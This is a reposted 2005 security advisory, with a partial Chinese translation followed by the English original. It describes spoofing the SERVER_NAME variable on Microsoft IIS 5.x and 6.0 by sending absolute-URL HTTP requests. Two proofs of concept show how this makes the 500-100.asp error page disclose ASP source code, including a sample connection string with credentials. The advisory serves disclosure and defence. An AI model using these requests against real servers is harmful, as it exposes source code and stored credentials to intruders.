http://book.51cto.com/art/201110/295931.htm
作者: Inge Henriksen
组织:[Bug.Center.Team-漏洞预警中心小组]
翻译: 剑心[BCT]
备注:非完整翻译(只针对重要性进行翻译),请根据原版进行参考.
IIs 5.0 5.1 6.0可以通过提交修改过的http请求来进行远程的"SERVER_NAME"参数欺骗.这样就可以通过IIS 500-100.asp错误页面来潜在地显示敏感的asp代码,该欺骗漏洞同样可以潜在的利用在一系列在第三方站点上的漏洞程序和web服务上.
技术细节描述
微 软的系列IIS在当主机"SERVER_NAME"参数是"localhost"的时候就会显示一些敏感信息.当"SERVER_NAME"主机变量是 "localhost"的时候,如果一个asp页面运行时有一个错误,那么该错误行的代码就会在浏览器中显示出来.如果你可以欺骗该 "SERVER_NAME" IIS参数,那么就可以让IIS显示你所要的东西.其他第三方web应用程序或者web服务如果信任该主机变量的话将同样受到该漏洞的影响.
被欺骗的"SERVER_NAME"主机变量可以通过asp中的request.servervariables("SERVER_NAME")或者. NET中的HttpContext.Current.Request.ServerVariables("SERVER_NAME")来访问,其他的程序 语言都有相应的方法来取得该变量,但是都存在着被欺骗的漏洞.
如果HTTP的请求来自远程的客户端,那么服务器的 "SERVER_NAME"变量就会返回web服务器自己的IP地址.但是如果HTTP请求来自与web服务器自己相同IP,那么 request.servervariables("SERVER_NAME")将会返回"localhost".这样就可以用来在web应用程序和 web服务中欺骗,浏览该web服务器的是服务器本身.遇到这样的情况web应用程序和web服务就会被欺骗从而显示管理界面给浏览者.一个利用该漏洞的 例子就是IIS 5.x 500-100.asp页面,该页面就是根据判断该主机变量从而决定是否显示发生错误的代码.
该主机变量的专业描述是"服务器的主机名,域名或者在self-referencing URLs中显示的IP地址".这样,在一些代码中就经常引用该变量来探测IP是否是服务器本身,这就带来了一系列的非法利用如Cookie窃取,数据转向或者其他的URL处理中.
有很多其他的应用程序利用了该变量,MSDN也为程序开发者举了很多应用程序被利用这个漏洞而攻击的例子.其中最严重的是Microsoft .NET SDK护照的例子,任何建立在这上面的web应用程序或者web服务都因为这个缺陷而存在漏洞.
Vendor Status: Notified 28. January 2005
原版:
It is possible to remotely spoof the "SERVER_NAME" Microsoft® Internet Information Server® 5.0, 5.1 and 6.0 server variable by doing a modified HTTP request. Thus potentially revealing sensitive ASP code through the IIS 500-100.asp error page, the spoof also opens up a potential range of exploits in third party web applications and web services.
Technical Description
Microsoft® IIS 5.x ® shows sensitive information if the "SERVER_NAME" IIS 5.x server variable is "localhost". If a IIS 5.x ASP page has an error, the code on the fault line in the ASP page is shown in the browser, but only if"SERVER_NAME" IIS server variable is "localhost". One can spoof the "SERVER_NAME" IIS server variable so that it shows whatever one want. Other third party web applications or web services may also be vulnerable if authentication depends on the validity this server variable. IIS 6.0 is vulnerable to the spoof, but it's 500-100.asp page is not vulnerable.
The IIS server variable that can be spoofed is the "SERVER_NAME", it can be accessed through request.servervariables("SERVER_NAME")withASP,andHttpContext.Current.Request.ServerVariables("SERVER_NAME")with .NET, other programming languages have other methods to access this server variable, but are equally vulnerable.
If the HTTP request comes from a remote client, then the server variable "SERVER_NAME" returns the IP address of the web server itself. If the HTTP request came from the same IP as the web server (thus the request came from the an authenticated user browsing from the web server itself), then request.servervariables("SERVER_NAME") returns "localhost". This fact is used as "proof" in web applications or web services that the person browsing the web server is in fact browsing from the web server itself. The web applications or web services may use this proof to display an administrative interface to the web browser user if such is the case. One exploitable example is the IIS 5.x 500-100.asp page(Note: the IIS 6.0 500-100.asp page is no vulnerable); the page uses the server variable to determine if to display the code where the error occurred.
The technical description of the server variable is "The server's host name, DNS alias, or IP address as it would appear in self-referencing URLs", it is therefore often used to determine the IP address of the web server itself in once code, this opens up for a range of exploits including cookie-stealing, data redirection, and other URL manipulation issues.
There are many other applications that utilize validity of this server variable, and MSDN holds many examples for developers that are easily exploitable with this bug; among the most serious are the Microsoft® .NET Passport SDK examples, any web application or web service based on these examples are probably vulnerable due to the bug.
Vendor Status: Notified 28. January 2005 but still no fix availible.
Confirmed applications: Microsoft® Internet Information Server® 5.0, Microsoft® Internet Information Server® 5.1 and Microsoft® Internet Information Server® 6.0.
Confirmed platforms: Microsoft® Windows® 2000 with SP4, Microsoft® Windows® XP Professional with SP2, Microsoft® Windows® 2003 with SP1.
Proof of concept #1
Ok, you will need some sort of telnet client for this:
1. Create a ASP called test.asp on the IIS web root and add the following code:
<% response.write request.servervariables("SERVER_NAME") %>
2. Try and access it from a remote server with telnet. Use the following HTTP request(Note: always do a double ENTER after a HTTP request to indicate end of request message):
GET /test.asp HTTP/1.0
3. The reply is the IP address of the web server, as one would expect.
4. Try and access it from the webserver itself. Use the following HTTP request:
GET /test.asp HTTP/1.0
5. The reply is "localhost", as one would expect.
6. Try and access it from a remote server with telnet again. This time use the following HTTP request:
GET http://localhost/test.asp HTTP/1.0
7. It replies "localhost", you have just fooled IIS to think that the HTTP request came from a user browsing from the web server itself.
Proof of concept #2
This PoC will show you how to get IIS 5.x to reveal code in a page that is not functioning correctly by tricking IIS's 500-100.asp to think that the HTTP request came from the webserver itself. In the IIS page 500-100.asp that reveals the ASP code if an error occurres. The 500-100.asp code snip looks like this(take especially note of the bold letters):
--- Snip from the IIS file <webroot>/IISHelp/common/500-100.asp ---
strServername = LCase(Request.ServerVariables("SERVER_NAME"))
strServerIP = Request.ServerVariables("LOCAL_ADDR")
strRemoteIP = Request.ServerVariables("REMOTE_ADDR")
If (strServername = "localhost" Or strServerIP = strRemoteIP) And objASPError.File <> "?" Then
Response.Write Server.HTMLEncode(objASPError.File)
If objASPError.Line > 0 Then Response.Write ", line " & objASPError.Line
If objASPError.Column > 0 Then Response.Write ", column " &
objASPError.Column Response.Write "<br>"
Response.Write "<font style=""COLOR:000000; FONT: 8pt/11pt courier
new""><b>"
Response.Write Server.HTMLEncode(objASPError.Source) & "<br>"
If objASPError.Column > 0 Then Response.Write String((objASPError.Column - 1),
"-") & "^<br>"
Response.Write "</b></font>"
blnErrorWritten = True
End If
...
Here you see that Microsoft® assumes that if the Request.ServerVariables("SERVER_NAME") equals "localhost"then the code where the bug happened is returned to the client making the HTTP request.
A normal HTTP request might look like this:
GET /test.asp HTTP/1.0
But by adding "http://localhost/" then you will see that the contents of Request.ServerVariables("SERVER_NAME") changes to "localhost". Like this:
GET http://localhost/test.asp HTTP/1.0
Not only localhost works, one can fake it to anything:
GET http://www.someserver.xom/test.asp HTTP/1.0
GET http://198.2.168.1/test.asp HTTP/1.0
Now, armed with this knowledge, let us ge down-and dirty to reveal some code remotely:
1. Create a global.asa file on the root of your IIS web root that has the following contents:
<script LANGUAGE=VBScript RUNAT=Server>
sub Application_OnStart()
Application("SQLConn") = Provider='sqloledb';Data Source=192.168.2.1;Initial Catalog=Test;User Id=someuser;Password=somepassword;"
end sub
</script>
2. Try and access the web from a remote server with telnet. Use the following HTTP request:
GET / HTTP/1.0
3. The reply does not reveal the code on the "Application("SQLConn")..." line, as it should since IIS 5.x recognizes you as beeing on a remote client. It does however tell you that there is a error on the page.
4. Now try the following HTTP request instead:
GET http://localhost/ HTTP/1.0
5. The reply displays the code, since the IIS server thinks you are browsing from the webserver:
Microsoft VBScript compilation (0x800A03EA) Syntax error 127.0.0.1//global.asa, line 3, column 34
Application("SQLConn") = Provider='sqloledb';Data Source=192.168.2.1;Initial Catalog=Test;User Id=someuser;Password=somepassword;"
